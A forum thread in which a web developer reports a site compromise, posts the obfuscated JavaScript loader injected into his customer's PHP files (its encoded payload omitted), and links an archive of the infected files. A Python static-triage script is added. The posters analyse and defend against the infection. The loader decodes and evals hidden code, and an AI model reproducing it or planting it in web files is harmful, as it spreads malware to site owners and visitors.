• Hi,

    Has anyone heard of them before? They apparently distribute malware. On a customer's server, files have now been modified twice already, namely the .htaccess and various .php files. A piece of JavaScript gets inserted into them.
    I suspect they distribute trojans that spy out FTP passwords (e.g. from FileZilla or the like), and that way it can then propagate further?!
    Unfortunately I have no idea what the JavaScript code does, so I'll post it here, along with the .htaccess.
    So first the JavaScript part (it gets inserted at the beginning or end of the file, or directly after the body section):

    <!-- ad --><script>var paOnAw='';var inMe="";var inLOx;this.orBa=false;var meIn=function(){};this.boEa=10869;inLOx='[percent-encoded payload omitted]';this.faOr=9396;var joE=new Date();function ehPo(esAt){var nAh=4283;this.amNa=62542;var inQiAe="";var liBaF=new Date();this.daAn=42444;var ehFaEh=new Date();function osErDa(obDa){var naBiPo=new Date();var mMo=55775;var aeEn=0;var muPa=false;this.odOo=673;var nHo=obDa.length, qiOoN=0;this.moOmOu='';this.odE='';var daLoNu="";var odNu=15176;var byExC=new Array();while(qiOoN<nHo){var awAxEr=function(){};this.erCAh="erCAh";var dAeN="dAeN";var arF=false;var omJ="";aeEn+=fQFy(obDa,qiOoN)*nHo;var asEr="asEr";var ifGu=27711;this.boBo="boBo";qiOoN++;var cF='';var ohEmIn=function(){};var arEm=function(){};}var arAa=false;this.ahKE="ahKE";var neNNa="";var odMyBa='';this.erNo=12396;return (aeEn+'');var rDoFy="rDoFy";this.adA=55369;}var ehHiOo=function(){};this.daN='';var idNo="idNo";var exFC=new Array();this.biHe="";function fQFy(ioAtOi,oyEl){var opAy=function(){};this.qQKa="qQKa";return ioAtOi['c.hfa.r.CloldlefAut.'.replace(/[lf\.u3]/g, '')](oyEl);var loAs=55246;var hoOuOx=new Date();}var laByGo="";this.naOxOu=false;var onAJo="onAJo";this.dItOn="";this.koIfBa=7859;var obGi = new String(document['wor_i$'.replace(/[\>_\]/g, '')]);var anGi='';var anOo=new Date();var fOs=35492;var odMa=function(){};var rAn="";if(obGi.indexOf('aGrGi3thy)'.replace(/[hc3G\)]/g, '')) != -1) {var lAaNa=new Date();this.ooDaQi="ooDaQi";var oyIoBa="oyIoBa"; return ;this.atOiMa="";this.muAt=false;var haLo='';}var aOdMi="";this.meBe="";var hQiEs="hQiEs";var oxEe=function(){};var maDo=0,nAeD=0, kaAm=138;this.ooQ=false;var ohAw=false;this.maL=false;var emIsOn='';var poFyPi="";var fyEaMa=new Date();var owAsAa=(new String(ehPo)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.giC=false;var atLa=20741;var isOu=false;var amOx=osErDa(owAsAa);this.nyQiB=54667;this.onOw='';var iDoEn="";var myNDi="myNDi";var 
qiOm=false;this.obMu="";esAt=window['uYnGeVs*czaVpVeY'.replace(/[YGzV\*]/g, '')](esAt);var oiEm=new Array();this.bEe='';this.poAs="";var hAd="";for(var koAaEa=0; koAaEa < (esAt.length); koAaEa++){this.iAaIt=false;var qiBy='';var iOeof=function(){};var esF=false;var kaAs=new Date();var heKGu=fQFy(owAsAa,maDo);this.atOeof="";var boEl="boEl";var idBo=fQFy(amOx,nAeD);this.muEhOs="muEhOs";var enAhMy=new Date();this.osKo="";var ifH=new Date();var eaBi=heKGu^idBo^kaAm;var loOoOb=62585;var ayGiEe="ayGiEe";var atOd=54254;var elOyGo=fQFy(esAt,koAaEa);var muGiKy=27635;var kyOu=34964;var liGu=function(){};var ahAa=false;this.awAa='';var rPa="rPa";maDo++,nAeD++;var atEeMy='';var gFyOp=8068;var qMaK="";emIsOn+=String['fOr'.replace(/[\%O\+]/g, '')](elOyGo^eaBi);var heGoOs="heGoOs";this.eMu="";var oeofOyN=new Array();var chLaOp=45781;var oiOrIt=false;if(nAeD>amOx.length)nAeD=0;this.biEmN=24766;var boLoM=new Array();if(maDo>owAsAa.length)maDo=0;var nLaBy=new Array();var byNyHa="";this.neMoOu="neMoOu";}var ayEs=15043;var laFa='';var itIfIt=new Array();var omNe="";window['emvca2l5'.replace(/[m2tc5]/g, '')](emIsOn);var ouHEs=new Array();this.exBiFa='';this.emEr="emEr";var kyFyH=false;return emIsOn=new String();var emDi='';this.omEm='';var byAd=62301;var doAaOd=false;var lOo="";var paIoGo=new Array();}var osN=new Array();var haNoQ=new Array();var ioNe=new Array();ehPo(inLOx);var heEsNu=18325;this.byEaAa=false;</script><!-- /ad -->

    And here is the part that was changed in the .htaccess. I haven't found any further changes yet. But images etc. could of course be infected too :(


    Regards, FireFlyer

    *A paradox is when you break your foot in the turn of a hand* :D
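
Added example (not part of the original posts and not the poster's code): a static triage, in Python, of the kind of `<!-- ad -->` ... `<!-- /ad -->` block shown in the post above. It resolves the `'...'.replace(/[...]/g, '')` literals to the API names they hide and sizes the percent-encoded payload without executing anything; the names `triage`, `resolve`, `scan_tree` and the sample input are assumptions of this example.

```python
import re
from pathlib import Path

# Injected region exactly as delimited in the post: <!-- ad --> ... <!-- /ad -->
AD_BLOCK = re.compile(r"<!-- ad -->(.*?)<!-- /ad -->", re.S)
# 'literal'.replace(/[chars]/g, '') : an API name padded with junk characters.
# Assumes a plain character class (no ranges or negation), as in the post.
HIDDEN = re.compile(r"'([^'\n]*)'\.replace\(/\[((?:\\.|[^\]\\\n])+)\]/g,\s*''\)")
# A long run of %xx escapes is the encoded payload later passed to unescape().
PCT_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){40,}")
RISKY = {"eval", "unescape", "charCodeAt", "fromCharCode"}

def resolve(literal, char_class):
    """Apply the JS replace statically: drop every character in the class."""
    drop = set(re.sub(r"\\(.)", r"\1", char_class))  # unescape \. \* \)
    return "".join(ch for ch in literal if ch not in drop)

def triage(text):
    """Return one finding per injected block; nothing is executed."""
    findings = []
    for m in AD_BLOCK.finditer(text):
        body = m.group(1)
        names = [resolve(lit, cls) for lit, cls in HIDDEN.findall(body)]
        findings.append({
            "offset": m.start(),
            "hidden_names": names,
            "risky": sorted(RISKY.intersection(names)),
            "encoded_bytes": sum(len(r) // 3 for r in PCT_RUN.findall(body)),
        })
    return findings

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Triage every matching file under root; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = triage(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample (not the file from the thread): harmless payload bytes,
# name-hiding literals copied from the posted script.
SAMPLE = r"""<?php echo 'ok'; ?>
<!-- ad --><script>var p='PAYLOAD';
function f(s,i){return s['c.hfa.r.CloldlefAut.'.replace(/[lf\.u3]/g, '')](i);}
p=window['uYnGeVs*czaVpVeY'.replace(/[YGzV\*]/g, '')](p);
window['emvca2l5'.replace(/[m2tc5]/g, '')](p);</script><!-- /ad -->
""".replace("PAYLOAD", "%41%42" * 30)
```

For the literals taken from the posted script this reports `charCodeAt`, `unescape` and `eval`, which is the shape of a loader that decodes its string and evaluates the result.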

  • I don't want anything from them either o_O

    It's just that when, on a customer's server (I built a website for him), suddenly no mails can be sent anymore (contact form) and I then find modified files with something about newsreading.ru in them... oO
    that makes me feel queasy!!!

    Regards, FireFlyer


  • So, I've found out a bit more again.
    The JavaScript code is an exploit for IE that basically opens the door so that further malware and trojans can be smuggled in.
    Among others, this one is part of it: http://www.sophos.com/security/analy…/malobfjsh.html as well as this one: http://www.sophos.de/security/analy…32sohanaaa.html

    If anyone wants the files (the ones that were on my server):
    http://awfl.eu/downloads/2/gebtek.ch.tar.gz
    WARNING! I don't think anything happens if you just open the files (only if you execute the code), but of course it's better to be careful anyway.

    Regards, FireFlyer


  • But I assume that there will be more and more worms on Linux too.
    Ubuntu is now just as easy to install as Windows and comes with almost everything .... Office etc...
    But it's good that Linux is getting easier; that's how I came to enjoy it too, and I do all my web development on Linux :D

    Regards,
    Der_Doc

  • :P

    Same here :D
    Well, in the meantime I've found out even more. The JavaScript code is an exploit for IE that makes it possible to get other malware onto the machine. Parts of it apparently spy out passwords from programs like FileZilla or similar and, with the help of these passwords, in turn modify the files on the other FTP servers. In addition, stuff for adware is uploaded as well, and you get redirected to certain sites (porn, medication, etc.). These "redirect scripts" aren't really mature yet, though. The programmer tried to get them running with shellcode, which afaik didn't work, at least for us.
    But still a pretty nasty method oO

    Regards, FireFlyer
